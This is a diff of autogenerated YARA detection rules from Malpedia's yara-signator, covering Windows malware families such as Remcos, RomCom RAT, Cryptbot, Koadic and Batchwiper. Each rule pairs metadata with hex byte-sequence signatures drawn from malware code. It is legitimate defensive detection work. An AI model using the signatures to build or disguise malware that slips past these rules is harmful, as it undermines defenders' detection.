+rule MALPEDIA_Win_Remcos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bdd5e11-901a-5fdb-be76-3d7bad7b15da"
+		id = "a82de676-3cc8-5fb4-a200-4d5a92641294"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ondritols"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ondritols_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remcos_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "31bdba3ae2c3b90f1c45acd89ae6f07099ae537657a6493ddb8dcbc12190c75b"
+		logic_hash = "a7cd1a6ac531bf59ce4eeb2a4df184c30ea794355d77ce56d9d521351da0d837"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126379,32 +126655,32 @@ rule MALPEDIA_Win_Ondritols_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4de0 0b0d???????? 894de0 8b550c 83c201 89550c 8b450c }
-		$sequence_1 = { 8b4d08 e8???????? 85c0 7514 3bf7 7309 5f }
-		$sequence_2 = { e8???????? 83c410 c644241301 3bd8 7505 c644241300 }
-		$sequence_3 = { 0fbe11 83fa5d 7513 8d45d4 50 8b4de8 }
-		$sequence_4 = { 85c0 0f8493000000 6853040000 68???????? 8b45e0 50 e8???????? }
-		$sequence_5 = { 68???????? e8???????? 2bc1 8b4d10 3bc1 7305 894510 }
-		$sequence_6 = { 8b5d08 56 8bf1 8b4614 83c9ff 2bc8 3bcb }
-		$sequence_7 = { 8b4dec e8???????? 898594feffff 8b8d94feffff 898d90feffff c645fc02 8b8d90feffff }
-		$sequence_8 = { 83e01f c1e006 8b0c95e0ca4600 833c08ff 7468 833d????????01 753c }
-		$sequence_9 = { 8d8d1fffffff 51 8b4d08 e8???????? 50 8b4de8 e8???????? }
+		$sequence_0 = { ff15???????? 50 ff15???????? 8d45f0 33f6 50 }
+		$sequence_1 = { ff15???????? 85c0 7410 6a00 ff35???????? }
+		$sequence_2 = { 50 ff15???????? 8d45f0 33f6 50 }
+		$sequence_3 = { ff35???????? ff15???????? 85c0 7410 6a00 }
+		$sequence_4 = { 8d45f8 50 ff15???????? ff7508 }
+		$sequence_5 = { 6a09 ff35???????? ff15???????? ff35???????? ff15???????? }
+		$sequence_6 = { 7508 ff15???????? 33c0 5f }
+		$sequence_7 = { 50 ff15???????? 8d45f0 33f6 }
+		$sequence_8 = { ab ab e8???????? 52 50 }
+		$sequence_9 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 }
 
 	condition:
-		7 of them and filesize < 964608
+		7 of them and filesize < 1054720
 }
-rule MALPEDIA_Win_Babar_Auto : FILE
+rule MALPEDIA_Win_Nettraveler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c6a7dce-047d-5f59-9e3d-d3334c41d05a"
+		id = "96950378-de52-56f3-b780-3b44898a07bb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babar_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nettraveler_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "f26db48f4ddda7baab96557200e3865f1c9bdc6e10a7518d2cd23d9a8273c7f2"
+		logic_hash = "874696e02901d10cd4804b0fe2c66596a287514a0c9a118564d29a023c32f51c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126418,38 +126694,32 @@ rule MALPEDIA_Win_Babar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bd6 0f8c7affffff 8bbc24d0000000 ddd9 }
-		$sequence_1 = { 3bd5 7e47 8d0c9500000000 2bd9 83c304 2bd5 }
-		$sequence_2 = { 3bd6 0f82eefeffff 8b742458 03f5 }
-		$sequence_3 = { 3bd6 7503 8d5014 895010 }
-		$sequence_4 = { 3bd6 0f86f9feffff 8b54243c 8b442438 }
-		$sequence_5 = { 3bd6 72d9 33f6 eb08 }
-		$sequence_6 = { 3bd6 721b 57 8bcb }
-		$sequence_7 = { 46 8d44bb08 8d5308 8d0cb7 }
-		$sequence_8 = { a3???????? 33c0 c3 8bc1 8b4c2404 c700???????? }
-		$sequence_9 = { 7708 0fb6c9 83e947 eb28 8ad1 80ea30 80fa09 }
-		$sequence_10 = { ffd6 83c001 50 e8???????? 8b15???????? 83c404 }
-		$sequence_11 = { c744242c00000000 ffd3 83c410 85ff 0f848d010000 e8???????? }
-		$sequence_12 = { ff15???????? 8b1424 52 ff15???????? 33c0 }
-		$sequence_13 = { 8b0d???????? 894f08 8b8c2450010000 8bc7 5f 5e }
-		$sequence_14 = { c1c90b 8bfa 03ce f7d7 0bf9 }
-		$sequence_15 = { e8???????? 8b8c2418010000 83c40c 5f }
+		$sequence_0 = { 72ed 8bc3 5e 5b c9 c3 }
+		$sequence_1 = { ffd6 59 50 8d85f8feffff 50 ffd6 59 }
+		$sequence_2 = { 720a 80f939 7705 80c1d0 eb1c 80f961 720a }
+		$sequence_3 = { ff75dc ff15???????? 8b45ec 5f 5b 5e c9 }
+		$sequence_4 = { 50 8d45f4 c745f004000000 50 6813000020 ff750c }
+		$sequence_5 = { 83c40c 6a0a ffd6 8d442418 50 ff742414 ffd3 }
+		$sequence_6 = { 80a5dcf3ffff00 f3ab 66ab aa 8bca 33c0 }
+		$sequence_7 = { 8975f8 8975e4 8975d0 8975c8 8975e8 bf04010000 8d45c8 }
+		$sequence_8 = { 46 46 83ff10 7ce3 6a08 b8???????? 59 }
+		$sequence_9 = { 59 50 8d8580f1ffff 50 ff750c ff15???????? 8945fc }
 
 	condition:
-		7 of them and filesize < 1294336
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
+rule MALPEDIA_Win_Glasses_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "898c87b0-2add-591b-b052-5ab6d1f02713"
+		id = "f78200de-17f0-543a-b1bc-b07d12f718a7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wpbrutebot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glasses_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4440d9063c782ae6ab73b1ab2283579374719f22f3d62d05493ede3029f224d5"
+		logic_hash = "f33966ab45324eba7508399d9cadcd3a853fcf3a139e1b51ccdad3cd57192d5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126463,32 +126733,32 @@ rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b542438 83f90f 7433 83f90e 7425 8b07 3b5004 }
-		$sequence_1 = { e8???????? 8d8d7ceaffff e8???????? 8d8d64eaffff e8???????? 8d8d4ceaffff e8???????? }
-		$sequence_2 = { e9???????? 83ef05 8364241404 741c 85ff 7e17 55 }
-		$sequence_3 = { c3 c785b001000002000000 8b7c2410 ff37 ff15???????? 57 ff15???????? }
-		$sequence_4 = { c645fc0e e8???????? c645fc0b 8b8560feffff 83f810 7213 40 }
-		$sequence_5 = { c3 803e00 0f8508feffff 5f 5e 5d 33c0 }
-		$sequence_6 = { c3 83be0c06000000 744d 6a01 56 e8???????? ffb63c060000 }
-		$sequence_7 = { c7864c01000000000000 ff15???????? 8d8654010000 c7864001000000000000 50 e8???????? 8d8668030000 }
-		$sequence_8 = { ff15???????? 8b442428 83c404 898380000000 8bc6 c7879007000000000000 5e }
-		$sequence_9 = { e8???????? 83c404 85c0 0f85c3020000 80fb2e 0f8572f9ffff e9???????? }
+		$sequence_0 = { ffd0 8d8d38f9ffff e8???????? 53 8d8d38f9ffff 898534f9ffff 51 }
+		$sequence_1 = { e8???????? 8d8d5cfaffff e8???????? 8bf8 33c0 89b5c0f9ffff 68c7000000 }
+		$sequence_2 = { e8???????? 8d8d58f7ffff c745fcffffffff e8???????? eb2e 8b8d94f7ffff 8a1439 }
+		$sequence_3 = { e8???????? 83c404 80bea100000000 b301 0f8585000000 8b86a4000000 6a01 }
+		$sequence_4 = { e8???????? 8bf8 83c404 85ff 0f84dbfdffff 683b960000 8bcf }
+		$sequence_5 = { e8???????? 8bf0 83c404 85f6 0f84add7ffff 681b010000 8bce }
+		$sequence_6 = { e8???????? 8986b4010000 e8???????? 8986e8010000 e8???????? 8986ec010000 8d4de8 }
+		$sequence_7 = { e8???????? 8d8d58ffffff e8???????? 8d8d3cffffff c645fc04 e8???????? 837f3803 }
+		$sequence_8 = { c645fc01 e8???????? 8d4d98 c645fc00 e8???????? 8d4de4 c745fcffffffff }
+		$sequence_9 = { eb07 e8???????? 8bf8 33f6 85ff 7e2b 8bff }
 
 	condition:
-		7 of them and filesize < 5134336
+		7 of them and filesize < 4177920
 }
-rule MALPEDIA_Win_Joanap_Auto : FILE
+rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e1b53cb-7deb-5667-8a28-f48e8944278b"
+		id = "ac368bf9-8ebe-5cf1-b296-f1d215e57efb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.joanap_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.romcom_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "6fdacc4c6daa9a4be9b126a90beb146cca04ff56d03b259a90c3b1977b1b6f5e"
+		logic_hash = "4c8cc2f6b48e17e29a12ff93bdda011d4ae8c63471090287633ffb79d5adb21a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126502,34 +126772,34 @@ rule MALPEDIA_Win_Joanap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd0 81e20f000080 7905 4a 83caf0 42 8a92fc002d00 }
-		$sequence_1 = { 56 57 8d4c2468 e8???????? a1???????? 6a10 6a10 }
-		$sequence_2 = { 8b7e0c 8b74246c 894e40 897e44 895648 c6464c00 }
-		$sequence_3 = { b941000000 8dbc243c010000 6a00 6a0f f3a5 c744241400000000 c744241c28010000 }
-		$sequence_4 = { 668b4024 51 55 6689842440080000 e8???????? 83c414 83f8ff }
-		$sequence_5 = { 5e 81c400010000 c3 6a00 6a00 6a00 681f000f00 }
-		$sequence_6 = { 75f1 33f6 68???????? 8935???????? ff15???????? 8b842494000000 }
-		$sequence_7 = { 51 ff15???????? 85c0 7471 397c2410 }
-		$sequence_8 = { 52 e8???????? 83ec14 8b0d???????? b0ff }
-		$sequence_9 = { 8d842494000000 6880000000 50 6800040000 68???????? 6a02 e8???????? }
+		$sequence_0 = { 4e8d044580000000 33d2 498bcc e8???????? 498bc6 48ffc0 42381c28 }
+		$sequence_1 = { 8a0401 41884500 49ffc5 ffc3 41b401 488b0f 4885c9 }
+		$sequence_2 = { e8???????? 488d05d4440800 4883c328 483bd8 75e8 488b5c2430 488bc7 }
+		$sequence_3 = { 4889742410 55 488dac2440ffffff 4881ecc0010000 488b05???????? 4833c4 488985b0000000 }
+		$sequence_4 = { 66413919 75f6 4c8bc6 488d542448 488d4c2470 e8???????? }
+		$sequence_5 = { c744243810270000 89442430 488b05???????? 4889442428 488364242000 41ffd5 }
+		$sequence_6 = { 4883f81f 0f87e7140000 e8???????? 488d85e8110000 49ffc6 46382430 75f7 }
+		$sequence_7 = { 8ad9 eb0a 488b55c8 4c8b45b0 32db 41f6c410 }
+		$sequence_8 = { 4c8975b0 4c8b6de8 488b75d0 32c9 884da8 4533f6 4533e4 }
+		$sequence_9 = { 498bd4 488bcf e8???????? 33db 84c0 758b 448bfe }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 1211392
 }
-rule MALPEDIA_Win_Entryshell_Auto : FILE
+rule MALPEDIA_Win_Cryptbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7004160-2921-54d6-8486-e3c529e5d739"
+		id = "a8c726cc-365c-50aa-acf5-f55e8b642760"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.entryshell_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptbot_auto.yar#L1-L208"
 		license_url = "N/A"
-		logic_hash = "99234173465f72334050322378ee4ca31b5cc7ed20c04f0fbc21ed7db2e5d8fb"
+		logic_hash = "47b1a044cb1a45373d0f5744b4acc6b2f29c9cc05af6ad96b3c4efc10032c638"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126541,32 +126811,45 @@ rule MALPEDIA_Win_Entryshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0e 3b0c85f4542501 7417 8b4d08 a1???????? 858150030000 7507 }
-		$sequence_1 = { 02410b 02c0 02410c 02c0 02410d 02c0 02410e }
-		$sequence_2 = { 84c9 742b 8d7e01 8a07 8bf7 0fb6d0 8bdf }
-		$sequence_3 = { 8b35???????? 8bd6 c1e208 8d8290e72501 8bc8 89442420 }
-		$sequence_4 = { 83c40c 68???????? 6800010000 68???????? e8???????? 83c40c 807c241400 }
-		$sequence_5 = { 51 50 e8???????? 83c410 b001 5f 5e }
-		$sequence_6 = { 6800080000 50 ff35???????? ff15???????? 85c0 0f8eb2010000 8d85d0efffff }
-		$sequence_7 = { 85c0 0f85fb000000 8db5b8f7ffff 0f1f4000 8d85b8efffff 803e00 7438 }
-		$sequence_8 = { 89540f24 8bd6 8b048578512501 8945ec 8b4dec 33ff }
-		$sequence_9 = { 844415dc 750a 8bfe 8a07 84c0 75e1 eb05 }
+		$sequence_0 = { 33c0 85ed 0f94c0 8be8 }
+		$sequence_1 = { e9???????? b944dc0000 e9???????? b964dc0000 e9???????? b95ddc0000 e9???????? }
+		$sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? }
+		$sequence_3 = { e8???????? 85c0 750f b955960100 e8???????? e9???????? }
+		$sequence_4 = { 0f9cc0 eb02 32c0 84c0 }
+		$sequence_5 = { eb0c b99fed0000 e8???????? 8907 }
+		$sequence_6 = { e8???????? 85c0 750e b9ca070200 e8???????? 8bc8 }
+		$sequence_7 = { 33c0 eb0a b917d90000 e8???????? }
+		$sequence_8 = { 1ac9 2403 80e110 8ad1 3c02 7509 }
+		$sequence_9 = { 743a 833902 7c35 8b442410 }
+		$sequence_10 = { 7419 8b542408 83fa01 7c10 0fbf4846 3bd1 }
+		$sequence_11 = { 740d 8bce e8???????? 8b4c2424 8901 }
+		$sequence_12 = { 7416 8b4210 83786000 750d }
+		$sequence_13 = { 744e 0fb74802 83e103 3bcb }
+		$sequence_14 = { 7422 8b0e b201 e8???????? }
+		$sequence_15 = { 8b4d0c 8b09 89ce bf00000000 }
+		$sequence_16 = { 8b4d08 8b4974 8b09 8901 }
+		$sequence_17 = { 8b4d0c 8901 895104 c745fc02000000 }
+		$sequence_18 = { 8b4d08 8b9584000000 8b85a0000000 899c249c000000 }
+		$sequence_19 = { 8b4d0c 898d4cffffff 8b55c8 899548ffffff }
+		$sequence_20 = { 8b4d0c 898c249c000000 8b4d10 898c2498000000 }
+		$sequence_21 = { 8b4d08 8b4978 8b19 89542408 }
+		$sequence_22 = { 8b4d0c 8b09 01f0 11fa }
 
 	condition:
-		7 of them and filesize < 663552
+		7 of them and filesize < 17138688
 }
-rule MALPEDIA_Win_Koadic_Auto : FILE
+rule MALPEDIA_Win_Dorshel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf49fa85-eb15-5b40-90ec-91247303052e"
+		id = "550d8628-f52a-56de-91a7-ece0c38b96fb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koadic_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dorshel_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "045758b315b8841fdc586ed89736311e4ca424527e393ec057e76ad188d18c25"
+		logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126580,32 +126863,32 @@ rule MALPEDIA_Win_Koadic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 42 895114 e8???????? 8901 833900 7407 8b01 }
-		$sequence_1 = { 7419 0fb608 33ce 81e1ff000000 c1ee08 33348d48154100 40 }
-		$sequence_2 = { 83c201 8955f8 8b4508 0fb64801 81e1c0000000 81f980000000 }
-		$sequence_3 = { 52 8b1401 52 ff15???????? 85c0 0f8e08010000 8b0f }
-		$sequence_4 = { 894804 5b 83c40c c3 0f8ed6000000 8bc7 99 }
-		$sequence_5 = { e8???????? 8b4c2410 5f c6040e00 5e 59 }
-		$sequence_6 = { 58 894514 8b442404 50 58 894518 8d44240c }
-		$sequence_7 = { 3b442404 7c54 ff742404 8b6c2420 }
-		$sequence_8 = { 57 8d45f8 50 56 53 ff750c ff15???????? }
-		$sequence_9 = { ff15???????? 8bf8 8d5f01 53 6a00 }
+		$sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 }
+		$sequence_1 = { 8d7708 8b3f 33fb f3a4 5f }
+		$sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da }
+		$sequence_3 = { 83c004 e2f9 58 54 50 }
+		$sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 }
+		$sequence_5 = { 54 50 8b4f04 33cb 51 8b0f }
+		$sequence_6 = { ffd5 85c0 74cd 8b07 01c3 }
+		$sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 }
+		$sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 }
+		$sequence_9 = { 5f 8b4704 33c3 83c104 99 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 24576
 }
-rule MALPEDIA_Win_Sfile_Auto : FILE
+rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75155690-b8c4-56cb-a521-79ec01661bb7"
+		id = "1c23cedb-b71d-5193-aa31-e8153ab4c4b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sfile_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_ugx_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f10b431d07234874e195b1e87ba788840300f4cb0ead711972642011468c2ef8"
+		logic_hash = "7d4c482dc506453890fdde88d716a3ceb2e3f8b35a1cb1eec11dbba57393fe56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126619,32 +126902,32 @@ rule MALPEDIA_Win_Sfile_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f4 8b45f4 8945fc 8b4dfc c7412800000000 8b55fc c7422000000000 }
-		$sequence_1 = { 8b888c050000 51 e8???????? 8b55f8 8b4a14 e8???????? 8945ec }
-		$sequence_2 = { 8b55fc 894210 894a14 8b4508 833800 7413 8b4d08 }
-		$sequence_3 = { ff15???????? 8b45ec 50 8b4df8 }
-		$sequence_4 = { e8???????? 8b4df8 83795800 740d 8b55f8 }
-		$sequence_5 = { e8???????? 83c404 8b4510 8b4858 894df8 }
-		$sequence_6 = { 33c0 e9???????? eb21 837d1003 751b }
-		$sequence_7 = { 8b45e8 8b4df8 8b511c 8910 }
-		$sequence_8 = { 8b5158 52 e8???????? 83c404 8b4510 }
-		$sequence_9 = { 8b4204 ffd0 8b4df8 c7412000000000 833d????????ff }
+		$sequence_0 = { ff969c060000 3bc3 89458c 0f8497030000 }
+		$sequence_1 = { 57 ff969c060000 3bc3 8945d8 0f8487020000 }
+		$sequence_2 = { 50 ff7508 ff969c060000 3bc3 8945bc 0f84a2040000 8b7db4 }
+		$sequence_3 = { ff55c0 57 ff55f8 ff55e8 }
+		$sequence_4 = { 50 e8???????? 6a01 6a10 57 68420d0000 }
+		$sequence_5 = { aa 33c0 8d7d9d 885d9c c645d47a ab ab }
+		$sequence_6 = { 8d8b00200000 894db4 8d9100200000 8955b8 8db200200000 8975dc 81c600100000 }
+		$sequence_7 = { ff55b8 85c0 741c 8d8584fdffff 50 }
+		$sequence_8 = { f3ab 66ab aa 33c0 8d7de9 885de8 8b7508 }
+		$sequence_9 = { e9???????? 8d86ae090000 50 57 ff969c060000 3bc3 8945c0 }
 
 	condition:
-		7 of them and filesize < 588800
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Batchwiper_Auto : FILE
+rule MALPEDIA_Win_Artfulpie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e0f816b-f334-5f53-bde8-8c13e5a1573a"
+		id = "196adf33-8b22-5c74-a62b-042eb2b3d59f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.batchwiper_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.artfulpie_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7b7cda4dab9bb8ec218294d77768f35a5d54eba78e3d583128b9f7cf9e6690f0"
+		logic_hash = "bdd4f2999d6ecf7d7a96f23629ce24760f5dc31c13fa4dc261ca04838f018c57"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126658,32 +126941,32 @@ rule MALPEDIA_Win_Batchwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 50 50 ff742408 e8???????? 8d0d2cb14000 5a }
-		$sequence_1 = { 8d0d24b14000 5a e8???????? c744240c02000000 }
-		$sequence_2 = { a1???????? 50 50 ff35???????? ff35???????? e8???????? 8d0d9cb14000 }
-		$sequence_3 = { 8d0d44b14000 e8???????? ba???????? 8d0d48b14000 e8???????? ba???????? 8d0d4cb14000 }
-		$sequence_4 = { ff96e0de0100 09c0 7407 8903 }
-		$sequence_5 = { e8???????? a3???????? 8b1d???????? 21db 7e65 c705????????00000000 8b1d???????? }
-		$sequence_6 = { e8???????? ba???????? 8d0d60b14000 e8???????? ba???????? 8d0d64b14000 e8???????? }
-		$sequence_7 = { 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 }
-		$sequence_8 = { 8b442408 894514 8b442404 894518 }
-		$sequence_9 = { 46 46 53 686d490100 57 }
+		$sequence_0 = { c1f906 53 6bd830 56 8b048d984e4100 57 8b7d10 }
+		$sequence_1 = { 33ff 3b7e0c 7d32 8b4608 }
+		$sequence_2 = { 03f1 53 8b413c 03c7 8b7dfc }
+		$sequence_3 = { b8b42b0000 e8???????? 0f2805???????? 8bc2 0f118558ffffff 56 }
+		$sequence_4 = { 89861c020000 8b45e0 8d4e0c 6a06 8d9004424100 5f 668b02 }
+		$sequence_5 = { e8???????? 83a6984e410000 59 83c604 81fe00020000 72dd b001 }
+		$sequence_6 = { 8b4028 03c1 51 ffd0 837e0800 7444 }
+		$sequence_7 = { 5d c3 ff7728 8b4724 56 ffd0 }
+		$sequence_8 = { 83c102 03c1 50 8b4720 }
+		$sequence_9 = { 33c9 8bc1 3914c598294100 7408 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Cookiebag_Auto : FILE
+rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac3bf6d4-71cf-5c5b-be8e-0bd3c3ef57c9"
+		id = "0e7d5cbc-4d8e-5d08-97c6-9c50d3154da3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cookiebag_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyturla_ng"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyturla_ng_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "679ac50c0d3fc2601e0f2f772686754e8efa393c4c8cfd8d8fb7af71ce9952bb"
+		logic_hash = "c4bc20a25d7b1bca8938e309f5cad122284666710845f9d27ecb23d7dbbc9d43"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126697,32 +126980,32 @@ rule MALPEDIA_Win_Cookiebag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c242c 52 55 50 c68424c000000011 }
-		$sequence_1 = { 83c9ff f2ae 8b456c f7d1 49 51 }
-		$sequence_2 = { 8d4c241c e8???????? 8b442418 c68424a80000000d 3bc3 895c2448 7505 }
-		$sequence_3 = { c7430857000000 6a01 8d8c2480000000 c7842404010000ffffffff e8???????? }
-		$sequence_4 = { 8b4c2450 897c2440 3bcf 897c2444 897c2448 741c }
-		$sequence_5 = { 8d4c243c c684248401000005 e8???????? 8b4c241c 33f6 3bce }
-		$sequence_6 = { 8b6c2408 56 8bf1 57 8a08 55 880e }
-		$sequence_7 = { 6a01 8d4c2460 c68424ac00000002 e8???????? 8b4c2450 3bcb 741c }
-		$sequence_8 = { 55 8bce e8???????? 89aedc000000 8b86e4000000 33ff }
-		$sequence_9 = { eb0c 83c1fe 51 e8???????? 83c404 895e40 895e44 }
+		$sequence_0 = { 0f118090000000 8b81a0000000 418980a0000000 0fb781a4000000 66418980a4000000 4188b8a6000000 4c89442420 }
+		$sequence_1 = { 48897570 4c897578 c6456000 eb0d 488b5d40 41be0f000000 4032ff }
+		$sequence_2 = { 498bdd 492bdc 48c1fb05 488bd3 488d4c2460 e8???????? 488bf8 }
+		$sequence_3 = { 0f114510 c745c068000000 c745fc00010000 488b442460 48894520 48894518 488b442468 }
+		$sequence_4 = { 837c243800 7474 e8???????? 39442438 7474 0f28442430 660f7f442440 }
+		$sequence_5 = { 488bce e8???????? b001 488b4df0 4833cc e8???????? }
+		$sequence_6 = { e8???????? 84c0 0f8450010000 498d4d08 e8???????? 33f6 e9???????? }
+		$sequence_7 = { 48b82700000000000080 eb27 4883fb16 b816000000 480f42d8 488d4b01 }
+		$sequence_8 = { e8???????? 488b45f0 4883f810 7232 488d5001 488b4dd8 488bc1 }
+		$sequence_9 = { 7734 498bc8 e8???????? 4c8933 48c1e605 4903f6 }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 635904
 }
